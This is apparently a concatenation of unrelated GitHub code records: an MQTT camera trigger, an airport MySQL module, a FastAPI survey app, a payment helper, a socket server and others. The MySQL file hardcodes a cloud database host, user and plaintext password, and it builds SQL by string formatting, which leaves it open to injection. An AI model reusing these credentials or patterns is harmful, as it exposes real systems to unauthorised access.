(y/n): ')\n            if proceed.lower() != 'y' and proceed.lower() != 'yes':\n                raise SystemExit('exiting to avoid deleting possibly unsaved pics')\n            else:\n                self.logger.info('deleting straggler pics')\n                for pic in pics:\n                    self.delete_pic(pic)\n\n    def snap_pic(self):\n        self.logger.info('snapping a pic')\n        now = datetime.now()\n        pic = os.path.join(self.pic_path, '{}_{}.jpg'.format(self.hostname, now.strftime(\"%Y-%m-%d_%H-%M-%S\")))\n        self.cam.capture(pic)\n        self.logger.info('snapped a pic')\n\n        return pic\n\n    def record_video(self, duration=60):\n        self.logger.info('recording video for {} seconds'.format(duration))\n        self.cam.resolution = (1920, 1080)\n        now = datetime.now()\n        vid = os.path.join(self.pic_path, '{}_{}.h264'.format(self.hostname, now.strftime(\"%Y-%m-%d_%H-%M-%S\")))\n        self.cam.start_recording(vid)\n        self.cam.wait_recording(duration)\n        self.cam.stop_recording()\n\n        # return the path like snap_pic() does, so _trigger_video() can transfer/delete it\n        return vid\n\n    def transfer_pics(self, pic_path, method='rsync'):\n        '''\n        _sync_pics() will attempt to synchronize the entire folder with rsync,\n        while _copy_pics() must be passed a path to a single pic which it will\n        then try to copy over the network via ssh.\n        '''\n        return self._sync_pics() if method == 'rsync' else self._copy_pic(pic_path)\n\n    def delete_pic(self, pic_path):\n        self.logger.info(\"deleting pic: {}\".format(pic_path.split('/')[-1]))\n        os.remove(pic_path)\n\n    def close(self):\n        '''no one wants a leaky memory'''\n        self.logger.info('shutting down camera')\n        self.cam.close()\n\n\nclass MQTTShutter(mqtt.Client):\n\n    def __init__(self, basepath, hostname, broker='mqtt-broker.local', port=1883, topic='', qos=0, keepalive=60, *args, **kwargs):\n        self.logger = self._init_logger()\n        self.broker = broker\n        self.port = port\n        self.topic = topic\n        self.qos = qos\n        self.keepalive = keepalive\n        mqtt.Client.__init__(self, *args, **kwargs)\n        self.steadycam = SteadyCam(basepath, hostname)\n        self.last_pic = ''\n\n    def _init_logger(self):\n        logger = logging.getLogger('mqtt_shutter')\n        logger.info('mqtt_shutter logger instantiated')\n        return logger\n\n    def _decode_msg(self, msg):\n        '''set logger level to DEBUG to log all received messages'''\n        payload = msg.payload.decode()\n        self.logger.debug('message received')\n        self.logger.debug('topic: {} QOS: {} payload: {}'.format(msg.topic, str(msg.qos), payload))\n        return payload\n\n    def _trigger_pic(self):\n        # delete last file generated\n        if self.last_pic:\n            self.steadycam.delete_pic(self.last_pic)\n\n        self.last_pic = self.steadycam.snap_pic()\n        self.steadycam.transfer_pics(self.last_pic)\n\n    def _trigger_video(self):\n        # delete last file generated\n        if self.last_pic:\n            self.steadycam.delete_pic(self.last_pic)\n\n        self.last_pic = self.steadycam.record_video()\n        self.steadycam.transfer_pics(self.last_pic)\n\n    def on_message(self, mqttc, obj, msg):\n        '''\n        message received callback\n        call the method associated with the message payload\n        '''\n        msg_methods = {\n            '1': self._trigger_pic,\n            '2': self._trigger_video\n        }\n        payload = self._decode_msg(msg)\n\n        if msg.topic == 'shutter':\n            try:\n                self.logger.info('received command {}'.format(payload))\n                msg_methods[payload]()\n            except KeyError:\n                self.logger.error('received unrecognizable command: {}'.format(payload))\n\n    def run(self):\n        self.connect(self.broker, self.port, self.keepalive)\n        self.subscribe(self.topic, self.qos)\n        self.logger.info('connected to MQTT broker {}'.format(self.broker))\n        self.logger.info('subscribed to topic \"{}\"'.format(self.topic))\n\n        response_code = 0\n        while response_code == 0:\n            response_code = self.loop()\n        return 
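A minimal trigger client for the `MQTTShutter` above, assuming it was started with `topic='shutter'` and the module's default `mqtt-broker.local` broker; publishing '1' snaps a pic and '2' records a video:

```python
import paho.mqtt.publish as publish

# '1' -> _trigger_pic, '2' -> _trigger_video (see msg_methods above)
publish.single('shutter', payload='1', hostname='mqtt-broker.local')
```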
response_code\n","repo_name":"barlaensdoonn/photogrammetric-timelapse","sub_path":"mqtt_shutter.py","file_name":"mqtt_shutter.py","file_ext":"py","file_size_in_byte":7461,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"7015190014","text":"import mysql.connector\r\n\r\nmydb = mysql.connector.connect(\r\n host=\"airport1.chf5rsalfcvg.ap-southeast-2.rds.amazonaws.com\",\r\n user=\"root\",\r\n password=\"Alexa&katie-220306\",\r\n database=\"airport1\"\r\n)\r\nc = mydb.cursor(buffered=True)\r\n\r\n\r\n#def create_table():\r\n # c.execute('CREATE TABLE IF NOT EXISTS TRAIN(Train_No TEXT, Name TEXT, Train_Type TEXT, Source TEXT, Destination TEXT, Availability TEXT)')\r\n\r\n\r\ndef add_data(airlines_id, airlines_at_id, r_id, airlines_name, airlines_from, airlines_to, airlines_total_distance, airlines_travel_time, airlines_departure, airlines_arrival,fare):\r\n c.execute('INSERT INTO airlines(airlines_id, airlines_at_id, r_id, airlines_name, airlines_from, airlines_to, airlines_total_distance, airlines_travel_time, airlines_departure, airlines_arrival,fare) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)',\r\n (airlines_id, airlines_at_id, r_id, airlines_name, airlines_from, airlines_to, airlines_total_distance, airlines_travel_time, airlines_departure, airlines_arrival,fare))\r\n mydb.commit()\r\n\r\n\r\ndef view_all_data():\r\n c.execute('SELECT * FROM airlines')\r\n data = c.fetchall()\r\n return data\r\n\r\n\r\ndef view_only_flight_number():\r\n c.execute('SELECT airlines_id FROM airlines')\r\n data = c.fetchall()\r\n return data\r\n\r\ndef get_flight(id):\r\n c.execute(\"SELECT * FROM airlines WHERE airlines_id='{}'\".format(id))\r\n data = c.fetchall()\r\n return data\r\n\r\ndef edit_dealer_data(new_airlines_id, new_airlines_at_id, new_r_id, new_airlines_name, new_airlines_from, new_airlines_to, new_airlines_total_distance, new_airlines_travel_time, new_airlines_departure, new_airlines_arrival,new_fare,\r\n airlines_id, airlines_at_id, r_id, airlines_name, airlines_from, airlines_to, airlines_total_distance, airlines_travel_time, airlines_departure, airlines_arrival,fare):\r\n c.execute(\"UPDATE airlines SET airlines_id=%s, airlines_at_id=%s, r_id=%s, airlines_name=%s, airlines_from=%s, airlines_to=%s, airlines_total_distance=%s, airlines_travel_time=%s, airlines_departure=%s, airlines_arrival=%s, fare=%s WHERE airlines_id=%s AND airlines_at_id=%s AND r_id=%s AND airlines_name=%s AND airlines_from=%s AND airlines_to=%s AND airlines_total_distance=%s AND airlines_travel_time=%s AND airlines_departure=%s AND airlines_arrival=%s AND fare=%s\",\r\n (new_airlines_id, new_airlines_at_id, new_r_id, new_airlines_name, new_airlines_from, new_airlines_to, new_airlines_total_distance, new_airlines_travel_time, new_airlines_departure, new_airlines_arrival,new_fare,\r\n airlines_id, airlines_at_id, r_id, airlines_name, airlines_from, airlines_to, airlines_total_distance, airlines_travel_time, airlines_departure, airlines_arrival,fare))\r\n mydb.commit()\r\n c.execute(\"SELECT airlines_id FROM airlines\")\r\n data = c.fetchall()\r\n return data\r\n\r\n\r\ndef delete_data(airlines_id):\r\n c.execute('DELETE FROM airlines WHERE airlines_id=\"{}\"'.format(airlines_id))\r\n mydb.commit()\r\n\r\ndef execute_query(q):\r\n c.execute(q)\r\n data = c.fetchall()\r\n return 
data\r\n","repo_name":"punarva10/Airport-Management-System-Using-AWS","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16437092490","text":"import runpy\nimport asyncio\nfrom ansible_rulebook.collection import (\n find_collection,\n find_playbook,\n find_source,\n has_playbook,\n has_rulebook,\n load_rulebook,\n split_collection_name,\n)\n\nclass MockQueue:\n async def put_nowait(self: \"MockQueue\", event: dict) -> None:\n print(event) # noqa: T201\n async def put(self: \"MockQueue\", event: dict) -> None:\n print(event) # noqa: T201\n\nsource = find_source(\"ansible.eda\", \"generic\")\nmodule = runpy.run_path(source)\nentrypoint = module[\"main\"]\nasyncio.run(\n entrypoint(\n MockQueue(),\n {\n \"randomize\": True,\n \"startup_delay\": 1,\n \"create_index\": \"my_index\",\n \"loop_count\": 2,\n \"repeat_count\": 2,\n \"repeat_delay\": 1,\n \"event_delay\": 2,\n \"loop_delay\": 3,\n \"shutdown_after\": 11,\n \"timestamp\": True,\n \"display\": True,\n \"payload\": [{\"i\": 1}, {\"f\": 3.14159}, {\"b\": False}],\n },\n ),\n)\n","repo_name":"tarilabs/demo20230801-invokeeda","sub_path":"manual.py","file_name":"manual.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16809687236","text":"from PIL import Image\nimport torch\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport torchvision\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset, DataLoader\nimport multiprocessing as mp\nimport os\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom net import Net\nfrom torchvision.utils import save_image\nimport shutil\nimport natsort\nfrom torchvision import models\n#from torchsummary import summary\nfrom torchvision import datasets, models, transforms\n\npath = './test/'#구분할 이미지 파일 폴더 경로 입력(input) #S:/bri/\noutput_path = './class/'#구분한 이미지파일 저장할 경로 입력(output)\n\ntext = open('./recogo.txt', 'w', encoding='UTF8' )\n\n\n#클래스 분류\ndef find_classes(dir):\n classes = os.listdir(dir)\n classes.sort()\n class_to_idx = {classes[i]: i for i in range(len(classes))}\n return classes, class_to_idx\n\n\ntransform = transforms.Compose([\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])\n ])\n\n#===================================================================#\n\npath_list = os.listdir(path)\npath_list = natsort.natsorted(path_list)\n\nlistlist =[]\ncopylist = []\nfile_name =[]\nac = listlist.append #이미지 경로\ncopy = copylist.append\nfileappend = file_name.append #이미지 이름\n\nname = './class/'\n\nfor i in path_list: # 왕 이름\n pathA = path + str(i) +'/'\n pathA_Copy = name + str(i) +'/'\n\n pathA_list = os.listdir(pathA)\n pathA_list = natsort.natsorted(pathA_list)\n for j in pathA_list: # 권 수\n pathB = pathA + str(j) +'/'\n pathB_C = pathA_Copy + str(j) +'/'\n\n pathB_list = os.listdir(pathB)\n pathB_list = natsort.natsorted(pathB_list)\n for k in pathB_list: # 장 수\n pathB_l = str(pathB)+str(k)\n pathB_l_C = str(pathB_C)+str(k)\n pathC_list = os.listdir(pathB_l)\n pathC_list = natsort.natsorted(pathC_list)\n for l in pathC_list:\n pathC_l = pathB_l+'/'+str(l) # 경로 + 이미지 파일 이름\n pathC_l_C = pathB_l_C\n ac(str(pathC_l)) #경로 저장\n copy(str(pathC_l_C))\n fileappend(l) #이름만 
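Note that `delete_data` above interpolates the ID straight into the SQL string, which is open to SQL injection, while the other queries already use `%s` placeholders. A parameterized sketch of the same delete, reusing the module-level cursor and connection:

```python
def delete_data_safe(airlines_id):
    # let mysql.connector quote the value instead of str.format
    c.execute('DELETE FROM airlines WHERE airlines_id=%s', (airlines_id,))
    mydb.commit()
```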
저장\n\n\nfiles = []\n\n# r=root, d=directories, f = files \nfor r, d, f in os.walk(path):\n for file in f:\n if '.jpg' in file:\n files.append(os.path.join(r, file))\ndir2 = './img/train/'\nclass_name, class_to_idx = find_classes(dir2)\n\nfor target_class in sorted(class_to_idx.keys()):\n class_index = class_to_idx[target_class]\n\nfor f in files:\n img = Image.open(f).convert(\"RGB\") # Load image as PIL.Image\n x = transform(img) # Preprocess image\n x = x.unsqueeze(0) # Add batch dimension\n model = torchvision.models.resnet152(num_classes = 186) # 모델 \n model.load_state_dict(torch.load('cifar_ResNet1818.pth'))\n model.eval()\n output = model(x) # Forward pass\n pred = torch.argmax(output, 1) # Get predicted class if multi-class classification\n \n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n \n for i in range(0,len(class_name)):\n if pred == i:\n if not os.path.exists(output_path+'/'+str(class_name[i])):\n os.mkdir(output_path+'/'+str(class_name[i]))\n shutil.copy( f ,output_path+'/'+str(class_name[i]))\n print(\"predicted as \" +str(class_name[i]))\n text.write(str(class_name[i]))\n\n\n\n","repo_name":"21toanyone-pro/Historical_Chinese_Characters_Classifier","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73549841707","text":"from fastapi import FastAPI, Depends\nimport uvicorn\nimport json\nfrom pydantic import BaseModel, TypeAdapter\nfrom enum import Enum\nfrom typing import List\nfrom models import Answer as DBAnswer\nfrom auth import JWTBearer\nfrom typing import Annotated\nfrom fastapi.middleware.cors import CORSMiddleware\n\nclass CategoryEnum(str, Enum):\n wellBeing = 'wellBeing'\n physicalActivity = 'physicalActivity'\n workAndStudying = 'workAndStudying'\n relationships = 'relationships'\n socialConnections = 'socialConnections'\n stress = 'stress'\n\napp = FastAPI()\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\nclass Answer(BaseModel):\n option: str\n impact_on: str\n impact: int\n\nclass Question(BaseModel):\n category: CategoryEnum\n question: str\n answers: List[Answer]\n\nQUESTIONS = []\nwith open(\"questions.json\", 'r', encoding='utf-8') as json_file:\n users = json.load(json_file)\n ta = TypeAdapter(List[Question])\n QUESTIONS = ta.validate_python(users)\n\n@app.get(path=\"/get_questions\")\ndef get_questions():\n return QUESTIONS\n\nclass UsersAnswer(BaseModel):\n category: str\n question: str\n impact_on: CategoryEnum\n impact: int\n\nclass UsrAns(BaseModel):\n user: str\n answers: List[UsersAnswer]\n\nclass User(BaseModel):\n name: str\n\n@app.post(path=\"/apply_answers\")\ndef apply_answers(uanswers: UsrAns, user: Annotated[User, Depends(JWTBearer())],):\n myd = {key: 0 for key in CategoryEnum}\n ansl = {key: 0 for key in CategoryEnum}\n answers = uanswers.answers\n for answer in answers:\n myd[answer.impact_on] += answer.impact\n ansl[answer.impact_on] += 1\n for key in myd.keys():\n if ansl[key] == 0:\n myd[key] = 0\n else:\n myd[key] /= ansl[key]\n if ansl[key] < 3:\n myd[key] = 0\n\n DBAnswer.create(\n user=user.name,\n well_being=myd[CategoryEnum.wellBeing],\n physical_activity=myd[CategoryEnum.physicalActivity],\n stress=myd[CategoryEnum.stress],\n social_connections=myd[CategoryEnum.socialConnections],\n work_and_studying=myd[CategoryEnum.workAndStudying],\n )\n return 
myd\n\n\n@app.get(path=\"/get_statistics\")\ndef get_statistics(user: str):\n    data = []\n    # filter on the model column, not the parameter compared with itself\n    records = DBAnswer.select().where(DBAnswer.user == user)\n    for record in records:\n        data.append({\"well_being\": record.well_being,\n                     \"physical_activity\": record.physical_activity,\n                     \"stress\": record.stress,\n                     \"social_connections\": record.social_connections,\n                     \"work_and_studying\": record.work_and_studying,\n                     \"month\": record.date.month,\n                     \"day\": record.date.day,\n                     \"weekday\": record.date.weekday()})\n    return data\n\n\nif __name__ == \"__main__\":\n    uvicorn.run(\"main:app\", host=\"127.0.0.1\", port=8000, reload=True)","repo_name":"Igor4er/codeforpeace","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"73206744428","text":"import requests\nfrom django.conf import settings\n\ndef get_token():\n    access_data = {\n        'imp_key':settings.IAMPORT_KEY,\n        'imp_secret':settings.IAMPORT_SECRET\n    }\n    url = \"https://api.iamport.kr/users/getToken\"\n    req = requests.post(url, data=access_data)\n    access_res = req.json()\n\n    if access_res['code'] == 0:\n        return access_res['response']['access_token']\n    else:\n        return None\n\ndef payments_prepare(order_id, amount, *args, **kwargs):\n    access_token = get_token()\n    if access_token:\n        access_data = {\n            'merchant_uid':order_id,\n            'amount':amount\n        }\n        url = \"https://api.iamport.kr/payments/prepare\"\n        headers = {\n            'Authorization':access_token\n        }\n        req = requests.post(url, data=access_data, headers=headers)\n        res = req.json()\n        if res['code'] != 0:\n            raise ValueError(\"API communication error\")\n    else:\n        raise ValueError(\"Token error\")\n\n\n\ndef find_transaction(order_id, *args, **kwargs):\n    access_token = get_token()\n    if access_token:\n        url = \"https://api.iamport.kr/payments/find/\"+order_id\n        headers = {\n            'Authorization':access_token\n        }\n        req = requests.post(url, headers=headers)\n        res = req.json()\n        if res['code'] == 0:\n            context = {\n                'imp_id':res['response']['imp_uid'],\n                'merchant_order_id':res['response']['merchant_uid'],\n                'amount':res['response']['amount'],\n                'status':res['response']['status'],\n                'type':res['response']['pay_method'],\n                'receipt_url':res['response']['receipt_url']\n            }\n            return context\n        else:\n            return None\n    else:\n        raise ValueError(\"Token error\")","repo_name":"Baepeu/python_web_programming_django3","sub_path":"06_onlineshop/order/iamport.py","file_name":"iamport.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"}
{"seq_id":"6703550755","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 13 11:35:57 2021\n\n@author: Qui\n\"\"\"\n\n#import multiprocessing\nimport threading\nfrom Pycom.pycomparse import PycomParse\nimport socket\nimport atexit\nimport time\nimport sys\n#import asyncio\n\nclass Pycom(object):\n    \n    def __init__(self, name, dtbot, sock=None, alivetime=None, mode='server', chunklen=512):\n        \n        self.name = name\n        self.pycomparse = PycomParse('a', self)\n        self.chunklen = chunklen\n        self.alivetime = alivetime\n        self.dtbot = dtbot\n        self.hostip = 'localhost'\n        self.port = 4432\n        \n        self.state = ''\n        self.new_state = 'connecting'\n        self.prev_state = ''\n        \n        self.verbose = True\n        self.prev_frametime = 0.0\n        self.serve_thread = False\n        self.clientsocket = False\n        self.keyboard_kill = False\n        self.sending_data = False\n        self.rc_file_size = 0\n        if alivetime is None:\n            self.alivetime = 9999999\n        if sock is None:\n            
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n \n else:\n self.sock = sock \n atexit.register(self.exit_handler)\n self.vprint('Initializing Pycoms')\n #self.process_loop()\n #self.server_proc = multiprocessing.Process(target=self.process_loop)\n self.server_proc = threading.Thread(target=self.process_loop)\n #asyncio.ensure_future(self.process_loop(), loop=self.dtbot.bot.loop)\n self.server_proc.start()\n #asyncio.create_task(self.process_loop)\n print('Pycom initialized')\n \n def _init_connecting(self):\n if not self.serve_thread:\n self.sock.bind((self.hostip, self.port))\n self.sock.listen(1)\n #self.serve_thread = multiprocessing.Process(target=self.server_listen)\n # self.serve_thread.start() \n self.new_state = 'listen'\n \n def _listen(self, *args):\n try:\n (self.clientsocket, address) = self.sock.accept()\n self.conactive = True\n self.new_state = 'connected'\n self.vprint('Client connected')\n\n except RuntimeError as e:\n print(e)\n self.new_state = 'listen'\n except KeyboardInterrupt as e:\n self.keykill()\n def set_len(self, newlen):\n if self.chunklen != newlen:\n self.chunklen = newlen\n def keykill(self):\n self.keyboard_kill = True\n self.vprint('Process loop terminated via key command')\n self.exit_handler()\n sys.exit()\n def _init_connected(self):\n print('Client Connected.')\n def _connected(self):\n try:\n self.receive()\n if not self.conactive:\n self.state = 'listen'\n self.vprint('Client has disconnected.')\n except KeyboardInterrupt as e:\n self.keykill()\n\n def _init_receive_file(self):\n try:\n fdata = self.receive_data()\n if not self.conactive:\n self.state = 'listen'\n self.vprint('Client has disconnected.')\n except KeyboardInterrupt as e:\n self.keykill()\n \n\n def receive_data(self):\n try:\n count = 0\n while True:\n output = self.get_socket_output(self.rc_file_size)\n count += len(output)\n print('Receieved ' + str(len(output)))\n if count >= self.rc_file_size:\n break\n \n return output\n \n \n #output = self.pycomparse.clean_received(output)\n #print('\\n' + str(output) + '\\n')\n except WindowsError as e:\n print(e)\n self.new_state = 'listen'\n \n def process_loop(self):\n while True:\n try:\n ctime = time.time()\n delta = time.time() - self.prev_frametime\n self.prev_frametime = ctime\n statemeth = '_' + self.state\n self.check_and_call(self, statemeth)\n self.change_state()\n except KeyboardInterrupt as e:\n self.keykill()\n \n if self.keyboard_kill:\n self.new_state = 'Terminated'\n break\n \n def send_toclient(self, msg):\n if not self.clientsocket:\n if self.state != 'connected':\n self.pycomparse.pycom_cmd(msg)\n return\n # if self.\n # self.sending_data = True\n stime = time.time()\n totalsent = 0\n mlen = len(msg)\n while True:\n if mlen < self.chunklen:\n msg += ';'\n mlen += 1\n else:\n break\n bmsg = msg.encode('utf-8')\n MSGLEN = len(bmsg)\n #print('Sending message: ' + msg)\n #while MSGLEN < self.chunklen:\n # msg = str(bmsg.decode('utf-8'))\n # msg += ';'\n # bmsg = msg.encode('utf-8')\n #MSGLEN = len(bmsg)\n while totalsent < MSGLEN:\n sent = self.clientsocket.send(bmsg[totalsent:])\n if sent == 0:\n self.new_state = 'Terminated'\n raise RuntimeError(\"socket connection broken\")\n \n totalsent = totalsent + sent\n\n total_time = time.time() - stime\n print(\"Send time: \" + str(total_time))\n #self.sending_data = False\n def receive(self):\n try:\n output = self.get_socket_output()\n output = self.pycomparse.clean_received(output)\n #print('\\n' + str(output) + '\\n')\n except WindowsError as e:\n print(e)\n 
self.new_state = 'listen'\n\n def get_socket_output(self, rcf_size=0):\n chunks = []\n bytes_recd = 0\n chunklen = self.chunklen\n #if rcf_size:\n # chunklen = int(rcf_size)\n while bytes_recd < chunklen:\n chunk = self.clientsocket.recv(min(chunklen - bytes_recd, chunklen))\n if chunk == b'':\n raise RuntimeError(\"socket connection broken\")\n chunks.append(chunk)\n bytes_recd = bytes_recd + len(chunk)\n inp = b''.join(chunks)\n output = inp.decode('utf-8')\n\n return output\n\n def check_and_call(self, obj, statemeth, args=[]):\n if hasattr(obj.__class__, statemeth):\n statefunc = getattr(obj.__class__, statemeth)\n if callable(statefunc):\n if '_init_' in statemeth or '_end_' in statemeth:\n premes = ':CheckCalls:\\tCalling:\\t'\n if '_end_' in statemeth:\n premes += '_end_: State:\\t'\n else:\n premes += '_init_: State:\\t'\n premes += self.state\n self.vprint(premes)\n if len(args):\n statefunc(obj, args)\n else:\n statefunc(obj)\n #time.sleep(0.5)\n \n def change_state(self):\n if self.new_state == '':\n return\n ns = self.new_state\n self.new_state = ''\n if ns != self.state:\n self.vprint(':Change_state:\\tChanging state to:\\t ' + ns)\n end_func = '_end_' + self.state\n self.check_and_call(self, end_func)\n \n self.prev_state = self.state\n self.state = ns\n \n init_func = '_init_' + ns\n self.check_and_call(self, init_func)\n \n\n \n def vprint(self, mes):\n if self.verbose:\n print('::Pycom::\\t' + mes)\n \n def _not_connected(self):\n self.vprint('Not connected')\n \n def exit_handler(self):\n self.vprint('Closing socket connections')\n self.sock.close()\n if self.serve_thread:\n self.serve_thread.terminate()\n self.server_proc.terminate()\n self.server_proc.join()\n self.serve_thread.join()\n\n","repo_name":"an0mali/Pycom","sub_path":"Pycom/pycom.py","file_name":"pycom.py","file_ext":"py","file_size_in_byte":8117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17070259468","text":"import threading\n\nfrom flask import Flask\nfrom flask_injector import FlaskInjector\nfrom injector import singleton\n\nfrom api import rest, pages\nfrom core import domain\nfrom core.analyser import TweetAnalyser\n\napp = Flask(__name__)\n\n\ndef start(db, ta):\n # Initialize Flask-Injector. 
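The Pycom protocol above pads every message with ';' up to `chunklen` so both sides can read fixed-size chunks, which breaks as soon as a payload exceeds the chunk size. A common alternative is length-prefixed framing, sketched here with a 4-byte big-endian header; this is not part of the original module:

```python
import struct

def recv_exact(sock, n):
    """Read exactly n bytes or raise, like the recv loop above."""
    buf = b''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise RuntimeError("socket connection broken")
        buf += chunk
    return buf

def send_msg(sock, msg):
    data = msg.encode('utf-8')
    sock.sendall(struct.pack('>I', len(data)) + data)   # 4-byte length header

def recv_msg(sock):
    (length,) = struct.unpack('>I', recv_exact(sock, 4))
    return recv_exact(sock, length).decode('utf-8')
```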
This needs to be run *after* you attached all\n # views, handlers, context processors and template globals.\n app.register_blueprint(rest.bp)\n app.register_blueprint(pages.bp)\n\n def module(binder):\n binder.bind(\n domain.Database,\n to=db,\n scope=singleton,\n )\n binder.bind(\n TweetAnalyser,\n to=ta,\n scope=singleton,\n )\n\n FlaskInjector(app=app, modules=[module], )\n\n app.run('0.0.0.0', port=5001)\n\n thread = threading.Thread(target=start, args=())\n thread.daemon = True # Daemonize thread\n thread.start()\n\n","repo_name":"CodeforLancaster/sitegeist","sub_path":"api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"8488287910","text":"'''\nCreated on 09/09/2014\n@author: azu\n'''\nfrom practices.first.evolutionaryStrategies.fitness import *\n\n\ndef initialize(number):\n return [[np.float(random.gauss(0, 100)) for i in range(number)] for u in range(1)]\n\n\ndef mutate(variables, generation, numberOfVariables):\n return [variables[i] + sigma[generation] * random.gauss(0, 1) for i in range(numberOfVariables)]\n\n\ndef success(replacement, generation, numberOfVariables):\n ps = replacement / float(generation)\n if (generation % numberOfVariables == 0):\n if (ps > 1 / 5.0):\n return sigma[generation - numberOfVariables] / 0.817\n if (ps < 1 / 5.0):\n return sigma[generation - numberOfVariables] * 0.817\n if (ps == 1 / 5.0):\n return sigma[generation - numberOfVariables]\n else:\n return sigma[generation - 1]\n\n\ndef select(fitnessArray, mode):\n f = fitnessArray[:]\n f.sort()\n middleValue = f.pop(len(f) / 2)\n selected = {'best': fitnessArray.index(min(fitnessArray)),\n 'worst': fitnessArray.index(max(fitnessArray))}\n return selected[mode]\n\n\ndef onePlusOne(func):\n print(\"\\nES: u+1 \\tFunction: %s\" % (func))\n generation = 0\n replacement = 0\n ps = 0\n num = numberOfVariables[func]\n comparison = 1\n variables = initialize(num)\n fitnessArray = [function[func](variables[u]) for u in range(1)]\n best = select(fitnessArray, 'best')\n while (generation < maxGenerations and sigma[generation] > epsilon and min(fitnessArray) > float('-inf')):\n actualBest = min(fitnessArray)\n selectedIndex = select(fitnessArray, 'best')\n offspring = mutate(variables[selectedIndex], generation, num)\n fitnessSon = function[func](offspring)\n worst = select(fitnessArray, 'worst')\n if (fitnessSon < fitnessArray[worst]): # Son better than worst dad\n variables[worst] = offspring\n fitnessArray[worst] = fitnessSon\n replacement += 1\n if (actualBest > min(fitnessArray)):\n comparison = abs(actualBest - min(fitnessArray))\n generation += 1\n if (generation < maxGenerations):\n sigma[generation] = success(replacement, generation, num)\n best = select(fitnessArray, 'best')\n print(variables[best], fitnessArray[best], generation, sigma[generation], comparison)\n if (num > 1):\n print(imageMaker(number_of_variables=num, function_id=func, name=str(func) + \"_onePlusOne\",\n point=([variables[best][0]], [variables[best][1]], [fitnessArray[best]])))\n else:\n print(imageMaker(number_of_variables=num, function_id=func, name=str(func) + \"_onePlusOne\",\n point=(variables[best], [fitnessArray[best]])))\n return \"Vars: %s Fitness: %s Generations: %d\" % (variables[best], fitnessArray[best], generation)\n\n 
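The `success()` function above implements Rechenberg's 1/5 success rule: grow sigma (divide by 0.817) when more than a fifth of mutations have succeeded, shrink it when fewer have, rechecked every `numberOfVariables` generations. A self-contained sketch of the same rule on the sphere function f(x) = sum(x_i^2), independent of the module's globals:

```python
import random

def one_plus_one_sphere(n=2, sigma=1.0, generations=500):
    x = [random.gauss(0, 1) for _ in range(n)]
    fx = sum(v * v for v in x)
    successes = 0
    for g in range(1, generations + 1):
        y = [v + sigma * random.gauss(0, 1) for v in x]   # mutate with step size sigma
        fy = sum(v * v for v in y)
        if fy < fx:                       # offspring replaces parent
            x, fx = y, fy
            successes += 1
        if g % n == 0:                    # adapt sigma every n generations
            rate = successes / g          # cumulative success rate, as in success()
            if rate > 0.2:
                sigma /= 0.817
            elif rate < 0.2:
                sigma *= 0.817
    return x, fx

print(one_plus_one_sphere())
```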
#onePlusOne(0)","repo_name":"jresendiz27/EvolutionaryComputing","sub_path":"practices/first/evolutionaryStrategies/onePlusOne.py","file_name":"onePlusOne.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"70598974826","text":"import datetime\nimport time\nimport json\nimport random\nimport math\nimport requests\nimport openpyxl\nfrom openpyxl.utils import get_column_letter\nimport os\n\n# print(datetime.datetime.now()) # 2022-12-03 10:38:24.112871\n# time.sleep(5.5) # задержка\n# print(datetime.datetime.now())\n\n# сериализация\n# десериализация\n\ndict1 = {\n \"key\": \"value\",\n \"name\": 'Bogdan',\n \"age\": 25,\n \"teacher\": True,\n \"subjects\": [\"Python\", \"Django\"]\n}\nprint(dict1)\njson_str = json.dumps(dict1)\nprint(json_str)\nprint(type(json_str))\n\n# file = open(\"new.json\", \"w\")\n# file.write(json_str)\n# file.close()\n\nwith open(\"new.json\", \"w\", encoding='utf8') as file:\n file.write(json_str)\n # json.dump(dict1, file)\n\n\nwith open(\"new.txt\", \"w\", encoding='utf8') as file:\n file.write(\"Привет\")\n\nwith open(\"new.json\", \"rb\") as file:\n # data = file.read()\n # print(data, type(data))\n dict2 = json.load(file)\n # dict2 = json.loads('''{\"key\": \"value\", \"name\": \"Bogdan\", \"age\": 25, \"teacher\": true, \"subjects\": [\"Python\", \"Django\"]}''')\n print(dict2, type(dict2))\n\n\nprint(random.randint(10, 100))\nprint(round(random.random() * 100, 2)) # 0.0 ... 1.0\nprint(math.floor(25.6)) # int\nprint(math.sqrt(25)) # 5.0\nprint(math.e) # 2.718281828459045\n\n# http - транспортный протокол\nurl = \"https://jsonplaceholder.typicode.com/todos/1\"\ndata = requests.get(url=url)\nprint(data, type(data)) # 